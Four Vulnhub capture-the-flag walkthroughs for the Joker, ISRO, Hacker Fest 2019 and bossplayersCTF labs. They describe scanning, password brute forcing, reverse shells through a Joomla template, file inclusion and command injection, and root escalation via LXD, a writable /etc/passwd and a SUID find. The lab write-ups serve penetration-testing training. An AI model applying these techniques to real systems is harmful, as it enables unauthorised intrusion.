HA Joker Vulnhub Walkthrough

Today we are going to solve our Boot to Root challenge called “HA: Joker” We have developed this lab for the purpose of online penetration practices. Solving this lab is not that tough if you have proper basic knowledge of Penetration testing. Let’s start and learn how to breach it.

Download Here

Level: Intermediate

Task: Find Root Flag on the Target Machine.

Penetration Methodologies

  • Scanning Network
    • Netdiscover
    • Nmap
  • Enumeration
    • Browsing HTTP Service
    • Performing Directory Brute force
    • Performing Bruteforce on Joomla
  • Exploitation
    • Exploiting the Joomla
    • Getting a reverse connection
    • Spawning a TTY Shell
  • Privilege Escalation
    • LXD

Walkthrough

Scanning Network

First of all, we try to identify our target. We did this using the netdiscover command. It came out to be

192.168.1.101

Now that we have identified our target using the above command, we can continue on to our second step that is scanning the target. We will use nmap to scan the target with the following command:

Enumeration

With the help of the scan, we now know that port number 22, 80 and 8080 are open with the service of SSH, HTTP respectively. Now that port 80 is open, so we opened the target IP address in our browser as shown in the following image:

This gave us a collection of Joker Quotes from his appearance over time in the comics and the movies. We also inspected the source code of this webpage, it was also riddled with the commented joker quotes.

As we couldn’t find anything of much use on the webpage hosted on the port 80, we decided to enumerate the service running on the port 8080. This was surprisingly only accessible to an authorized user with proper credentials as shown in the image given below. It’s time to look for these credentials.

Now while we were busy browsing the webpages, we also started a directory bruteforce scan using the dirb tool. We applied different variants of scans with different extensions. We got success with the .txt extension. We found the secret.txt.

Now that we have found the secret.txt file. It contained a conversation between Batman and our beloved Joker. Here there was a repeat mention of the word ‘rock’ this struck us as ‘rockyou.txt’ the famous bruteforce dictionary. Also, there was a mention of the ‘one of your 100 poor jokes’. It was a bizarre mention of the word 100. So what we accumulated from this was that the password for the panel at port 8080. Must be in the top 100 passwords of the Rockyou dictionary.

Now that we have formulated a plan to use the top 100 passwords from the rockyou.txt dictionary, it’s time to compile a smaller dictionary of those 100 passwords so as to make the bruteforce faster and lighter. To do this we are going to use the head command.  From the head command, we are going to pass the parameter of 100 keywords and direct the output generated by this command in a text file using the greater than (>) symbol.

Now as this is a web application and we are required to perform a brute force, we are going to use the BurpSuite Application. For that, we are going to open the webpage hosted on the port 8080 and enter any random characters in the login panel and press the OK button after applying the burp proxy.

As we started the BurpSuite and clicked on the OK button after applying the proper proxy, and enabling the Intercept option on the BurpSuite, we are able to capture a request that was generated. Further on, we right-clicked on the request captured and selected the option “Send to Intruder”.

After Sending it to Intruder, we are going to check the Intruder tab for the transferred request. Here in the Intruder section, we are going to get into the Positions Tab. Here we select the Attack type to be Sniper. We will select the Authorization hash and Click on the Add Button on the right side.

The base64 encoded value of Authentication is a combination of username and password now the scenario is to generate the same encoded value of authentication with the help of user password dictionary, Therefore, I have made a dictionary which contains both user password names in a text file.

In order to use the dictionary as payload click on payload tab under intrudernow load your dictionary which contains user password names from payload options.

So we are going to modify the dictionary we created earlier by adding the username as ‘joker’ followed by a ‘:’. So that it might look like:

After applying the above-stated settings, we went back to the Positions Tab and Clicked on the “Start Attack Button”. The Bruteforce starts and gives the result. Here we are going to get a lot of 401 errors. But we will have to find the entry with the 200 code.

As this text is encoded in the Base64 Encryption. We converted it into the Plain Text. Upon conversion, it came out to be:

We went back to the login panel and entered the username as ‘joker’ and password as ‘hannah’. This was a successful login. And we could see the Joomla Website as shown in the given image.

As this is a Joomla website, its login panel must be at /administrator. So we surfed that URL in our Browser. Here we got stopped by another login panel. After a brief searching over the internet, we found that the default credentials of Joomla are ‘joomla:joomla’. So, before trying anything else, we will be trying these login credentials.

Now that we have logged in on the Joomla as the SuperUser. To exploit the Joomla server, we will use the PHP reverse shell. They can be found in Kali Linux. We will move on to the Template Section. To do so, we will first click on the Extensions Option on the Menu. Then, traverse in the beez3 template and choose Customise. This is open an edit section as shown in the image. Now, select the index.php and replace the text inside the index.php with our reverse shell. Remember to change the IP Address and/or change the port.

After editing the index.php, save the file by clicking on the Save Button. Now we have successfully replaced the index.php with our reverse shell script. Now, all that’s left to do is run the index.php. Now to get a session, we need a listener, where we will get our reverse shell. We will use netcat for creating a listener as shown in the image given below

After we got the shell, we saw that the shell that we got is an improper shell, so we used the python one-liner to convert it into a proper shell. After conversion, we ran the id command. We saw that this shell is of the user ‘www-data’. We saw that this user is a part of the lxd group. This could be our way to root.

Privilege Escalation

To learn the Lxd privilege escalation in detail, refer to this article: “Lxd Privilege Escalation”.

In order to take escalate the root privilege of the target machine, we will have to create an image for lxd. To that, we will first, Download build-alpine in the attacker machine (Kali Linux) through the git repository. After that, we will be traversing it into the lxd-alpine-builder directory and execute the script “build -alpine” that will build the latest Alpine image as a compressed file.

Now we will send the tar file to the target machine. We will be using the Python HTTP server for this transfer.

On the target machine, firstly we will be downloading the alpine image followed by importing an image for lxd. After that, we will be Initializing the image inside a new container.

Finally, we will be mounting the container inside the /root directory. Once inside the container, navigate to /mnt/root to see all resources from the target machine. After running the bash file. We see that we have a different shell, it is the shell of the container. This container has all the files of the host machine. So, we enumerated for the flag here and we found the final.txt. This concludes this Boot to Root Challenge.

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

HA: ISRO Vulnhub Walkthrough

Today we are going to solve our CTF challenge called “HA: ISRO” We have developed this lab for the purpose of online penetration practices. Solving this lab is not that tough if have proper basic knowledge of Penetration testing. Let’s start and learn how to breach it.

Download Here

Level: Intermediate

Task: Find 4 Flags on the victim’s machine.

Penetration Methodologies

  • Scanning Network
    • Netdiscover
    • Nmap
  • Enumeration
    • Browsing HTTP Service
    • Performing Directory Bruteforce
  • Exploitation
    • RFI
    • Create PHP reverse shell
    • Getting a reverse connection via RFI
    • Spawning a TTY Shell
  • Privilege Escalation
    • Writable /etc/passwd File

Walkthrough

Scanning Network

First of all we try to identify our target and for this use the following command:

Now that we have identified our target using the above command, we can continue on to our second step that is scanning the target. We will use nmap to scan the target with the following command:

Enumeration

With the help of help scan, we now know that port number 22, 80 are open with the service of SSH, HTTP respectively. Now that port 80 is open we open the target IP address in our browser as shown in the following image:

It opened a webpage as shown in the above image. Here we found the Bhaskara page, so now we opened and found an information webpage there as shown in the image below:

As a convention, we will enumerate the webpage by going through the source code. We see that we have the Bhaskara Launch Code. This seems a base64 encoded text.

Now we got to decode it. To do this we will be using the combination of the echo command and the base64 -d.

After decoding the base64 encoded text we get “/bhaskara”. This seems a hint that there might be a directory named bhaskara.

So, we went on to our browser in order to browse the bhaskara directory. We see that a file is downloaded when we browse the URL. This is a 2MB file. After enumerating the file, we came to realize that it is a TrueCrypt file.

Now in order to crack this file, we are going to use extract its hash using the true.py. You can download the true.py from this link. We named the file as true.py and ran it and it gave us the password as xavier.

Now as we knew it was a TrueCrypt file. That means it might be hiding something inside it. So, we tried to open it using VeraCrypt by providing it path and selecting a volume as shown in the given image.

Upon mounting the TrueCrypt file on a slot, we are asked to enter the password. We enter the password that we found earlier i.e. ‘xavier’

 It opened up to show a text file labelled ‘flag.txt’. We opened it; it gave us our first flag. Bhaskara Flag.

Bhaskara Flag: {b7bb88578a70970b9be45ac8630b6f9d}

Now let’s move forward in Enumeration. We also performed a directory scan. This gave us an /img directory. We performed an extension directory scan. It gave us a connect.php.

We went into the /img directory. Here we found an image called aryabhata.jpg.

We will download the aryabhata.jpg and opened it.  

Upon opening it we found it to be the poster for Aryabhata satellite as shown in the image given below.

As we couldn’t find anything specific with the image, we suspected that there is some steganography involved. Hence, we decided to use the Steghide tool to extract anything that might be hidden in the image. We saw that there is a text file named flag.txt hidden inside it. On opening it we found the Aryabhata flag. 

Aryabhata Flag:{e39cf1cbb00f09141259768b6d4c63fb}

Exploitation

Back to the Web Browser, we also found a connect.php in our drib directory bruteforce. This gave us nothing. Then we realized that this can be command injection. Now to test we tried opening the etc/passwd file through it. As seen in the image given below, we see that it’s a File Inclusion Vulnerability.

We edited our shell.php, to enter the attacker machine IP address. And then closed the file after saving it. Now we need to send this to the target machine. Hence, we started a python http server using the one-liner showed below.

We are gonna capture a reverse connection using the netcat. So we need to initiate a listener on the port mentioned in the shell file.

After starting the listener on the target machine, we will run the shell on the target machine using the File Inclusion Vulnerability.

Upon execution, the shell gave us a session to the target machine. As seen in the image given below, it wasn’t a proper shell. So, we needed a python one liner to convert it into a proper shell.

We used netstat command to check for the IP address and ports the target machine is listening on and found that a web service (3306) is allowed for localhost only. The most common service to run on the port 3306 is MySQL. Let’s enumerate in that direction.

We tried to login in the MySQL database as the root user. After logging in the MySQL, we enumerated the databases. Here we found a database named ‘flag’. We looked inside the tables of flag database. Here we found our second flag Mangalyaan Flag.

Mangalyaan Flag:{d8a7f803e36f1c84e277009bf2c0f435}

Privilege Escalation

As a part of our Enumeration for Escalating Privilege on the target machine, we try to find if the /etc/passwd is writable. We can see that the file is, in fact, writable. This is our way to move forward.

Now we going to need the password hash for the user that we are going to create on the target machine by making an entry in the /etc/passwd file. We are going to use the openssl to generate a salted hash.

Now back to our remote shell on the target machine. Here we are going to use the hash that we generated in the previous step and make a user raj which has the elevated privilege. We used the echo command to make an entry in the /etc/passwd file. After making an entry we checked the entry using the tail command. Now, all we got to do is run su command with the user name we just created and enter the password and we have the root shell. We traversed inside the root directory to find our final flag, Chandrayaan Flag.

Chandrayaan Flag:{0ad8d59efe7ce5c820aa7350a5d708b2}

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

Hacker Fest: 2019 Vulnhub Walkthrough

Hacker Fest:2019 VM is made by Martin Haller. This VM is a purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. It is of easy level and is very handy in order to brush up your skills as a penetration tester. The ultimate goal of this challenge is to get root and to read the root flag.

Level: Easy

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this link.

Penetration Testing Methodology

  • Network Scanning
    • Nmap port scan
  • Enumeration
    • Browsing HTTP Service
    • Scanning WordPress (wpscan)
  • Exploiting
    • WordPress Google Maps Plugin SQL Injection
    • WordPress_admin_shell_upload exploit
  • Privilege Escalation
    • Abusing Sudo Rights

Walkthrough

Network Scanning

To identify target IP address we will initiate with netdiscover and thus we found 192.168.0.20. Let’s now go for advance network scanning using the nmap Aggressive scan.

We learned from the scan that we have the port 80 open which is hosting Apache httpd service, along with the ports 21 and 22  open. This tells us that we also have the FTP service, SSH Service running on the target machine.

Enumeration

Since we got the port 80 open, we decided to open the IP address in the web browser.

This gave us a site that looks like a WordPress site, it’s time to perform a wpscan on the target machine.

If we move further down in the wpscan result we find the WordPress google map plugin. It is not updated. So, this could help us. Let’s try and exploit it.

WordPress Google maps Sqli Exploit

We searched the google maps on the Metasploit Framework.  This gave us the following exploit. This exploit works on a SQL injection vulnerability in a REST endpoint registered by the WordPress plugin wp-google-maps between 7.11.00 and 7.11.17 (included). As the table prefix can be changed by administrators, set DB_PREFIX accordingly.

So, we got the following hash through the SQL injection that was on the target machine.

Whenever we get some hashes all we remember is our best friend John The Ripper. The hashes were saved in a file named ‘hash’. We ran it through john. After working on it for some time. John cracked one of the hashes, it came out to be ‘kittykat1’.

The very first method that we have is Metasploit framework, this module takes an administrator username and password, logs into the admin panel, and uploads a payload packaged as a WordPress plugin. Because this is authenticated code execution by design, it should work on all versions of WordPress and as a result, it will give meterpreter session of the webserver.

Great!! It works wonderfully and you can see that we have owned the reverse connection of the web server via meterpreter session.

Privilege Escalation

On the other hands start your attacking machine and first compromise the target system and then move to the privilege escalation phase. After successful login in the victim’s machine now executes below command to know sudo rights for the current user.

Author: Japneet Kaur Gandhi is a Technical Writer, Researcher and Penetration Tester. Contact here

bossplayersCTF 1: Vulnhub Walkthrough

bossplayersCTF 1 VM is made by Cuong Nguyen. This VM is a purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. It is of intermediate level and is very handy in order to brush up your skills as a penetration tester. The ultimate goal of this challenge is to get root and to read the root flag.

Level: Intermediate

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this link.

Penetration Testing Methodology

Network Scanning

  • netdiscover
  • nmap port scan

Enumeration

  • Browsing HTTP Service
  • Performing Directory Bruteforce
  • Decoding Encoded Text

Exploiting

  • Command Injection

Privilege Escalation

  • SUID on find command

Capture the flag

Walkthrough

Network Scanning

The first step to attack is to identify the target. So, identify your target. To identify the target, we will use the following command:

Now we will run an aggressive port scan using nmap to gain the information about the open ports and the services running on the target machine.

We learned from the scan that we have the port 80 open which is hosting Rocket httpd service, and we have the port 22 open. This tells us that we also have the OpenSSH service running on the target machine.

Enumeration

Further, we need to start enumeration against the host machine, therefore we navigated to a web browser for exploring HTTP service. Here we have the description of the machine that tells us that this is an extremely easy CTF. It is for those who are getting started with the CTFs. It also tells us that there might be rabbit holes. So we will try to avoid those.

Now as the convention, we checked the source code of the webpage in the hope to get some valuable hint to move forward with our enumeration. Here, we got an encoded value. This might lead us somewhere.

But we wanted to further enumerate with a directory bruteforce. To do this we will use the dirb. With this directory bruteforce scan, we got a robots.txt file. On browsing it on our web browser we see that we have another encoded text titled as super-secret password. We decoded it to find a troll message “lol try harder bro”. This might be the rabbit hole mentioned earlier. 

We went back to the commented encoded text we found earlier in the Source code of the webpage. It seemed like Base64, so we tried to decode it using base64 command. It gave back another encoded text. This also seemed like Base64, so we decoded it again. This gave back another encoded text. This is getting really tiring. Now we decoded it again to find workinginprogress.php. Not this seems important. All those decodings were not gone for waste.

We tried to open this file on our Web Browser as shown in the image given below. It was a checklist of some kind. It showed that Linux Debian is installed, Apache2 is installed and PHP is also installed. But the stuff that’s not completed tests the ping command and fix the privilege escalation. These seem like major hints.  

Exploiting

As it said to test the ping command, it got us thinking that this might, in fact, be command injection. To further inspect this suspicion, we tried to run the id command through the URL as shown in the image given below. This made our suspicion true. This, in fact, is Command Injection.  

To exploit command injection, we will be using the netcat invoke shell one-liner. Before running that we need a netcat listener to receive the shell that is going to be invoked.

After running the listener, we went back to our browser, and here instead of the id command that we ran previously, it was time to run the shell invocation command. Here we invoked bin/bash shell to the IP Address 192.168.1.105 [Kali Linux]. With the port that we started the listener with.

Now, we went back to our terminal, where we ran the netcat listener. We see that we have successfully got a session. But the shell that came with the session is an improper one. So in order to convert it into a proper shell, we ran the python one-liner. This gave us a proper shell. As soon as we got this shell, we saw that the session that we got is of user www-data. This means that this is an unprivileged shell. We will have to work out a way to that elevated privilege shell. For this, we start to enumerate the target machine through the shell we got.

As a part of our enumeration procedure, we ran the find command with -perm parameter to search for any file having SUID permissions. The find command itself has this permission. This made our job a little easy.

Privilege Escalation

We ran the find command and tried to invoke the /bin/sh shell using it as shown in the image given below. This gave back us a root shell. We confirmed this is a root shell by running the id command.

Now we wanted to enumerate for the Root Flag. We went into the home directory of the root user. Here we found the file named root.txt. On opening it we got a base64 encoded text. It said “congratulations”. This concludes this CTF Challenge.

NOTE: Here we ran typed the command as simply we enter. The shell however just prints what we type again with it. So it gave the look as shown in the image.

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here